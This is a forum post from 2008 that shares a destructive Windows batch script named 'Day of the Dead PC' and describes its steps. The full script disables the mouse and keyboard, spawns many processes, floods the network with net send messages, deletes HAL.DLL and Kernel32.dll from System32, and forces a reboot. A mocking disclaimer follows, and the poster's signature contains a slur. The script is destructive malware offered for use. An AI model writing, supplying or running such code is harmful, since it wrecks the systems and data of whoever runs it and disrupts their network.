User Tag List

Results 1 to 10 of 16

Thread: Day of the Dead PC (.bat) 0.0

Threaded View

Previous Post Previous Post   Next Post Next Post
  1. #1
    Day of the Dead PC (.bat) 0.0

    User Info Menu

    Day of the Dead PC (.bat) 0.0

    Heres a little .BAT file i put together after seeing dark bloods batch commands and stuff.

    So here it is, heres a brief description of what it does.....

    Disables mouse and keyboard, i got the lines from that from dark bloods batch commands.

    Slows down the computer by running a lot of applications.

    Floods the network with johnnys flood BAT command he posted in funny CMD and VBS commands.

    Deletes kernel32.dll and HAL.DLL

    Restarts the computer

    I wrote the delete and restart because they are easy :)


    @echo off
    :disable
    C:\Windows\RunDLL32.exe mouse,disable
    C:\Windows\RunDLL32.exe keyboard,disable
    goto SlowDown
    :SlowDown
    start explorer.exe
    start notepad.exe
    start iexplore.exe
    start taskman.exe
    start notepad.exe
    start notepad.exe
    start notepad.exe
    start notepad.exe
    start notepad.exe
    start notepad.exe
    start notepad.exe
    start notepad.exe
    start notepad.exe
    start notepad.exe
    start notepad.exe
    start notepad.exe
    goto FNetwork
    :FNetwork
    net send * WORKGROUP ENABLED
    cls
    net send * WORKGROUP ENABLED
    net send * WORKGROUP ENABLED
    cls
    net send * WORKGROUP ENABLED
    net send * WORKGROUP ENABLED
    cls
    net send * WORKGROUP ENABLED
    net send * WORKGROUP ENABLED
    cls
    net send * WORKGROUP ENABLED
    net send * WORKGROUP ENABLED
    cls
    net send * WORKGROUP ENABLED
    net send * WORKGROUP ENABLED
    cls
    net send * WORKGROUP ENABLED
    net send * WORKGROUP ENABLED
    cls
    net send * WORKGROUP ENABLED
    net send * WORKGROUP ENABLED
    goto Kernel
    :Kernel
    del %SystemRoot%\System32\HAL.DLL
    del %SystemRoot%\System32\Kernel32.DLL
    goto Reboot
    :Reboot
    shutdown -r -t 15 -c "You are DOOMED"
    pause


    If you are dumb enough to actually use this i take no responsibility if you damage your computer in any way. Its your dumb ass fault for doing it i said damn well what it does.
    Last edited by Zeus; 08-26-2008 at 04:37 PM.
    Every man for himself. You trust no one but yourself, if you want something done you do it your self don't rely on others. You watch your own back, you fight your own fights its you against the world.

    Quote Originally Posted by Some phag
    -.BUS.-'s mommy says to Cannon, "I love you,
    I love you, I love you"
    The Cannon on the bus says, "I love you, too"
    All through the town.

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •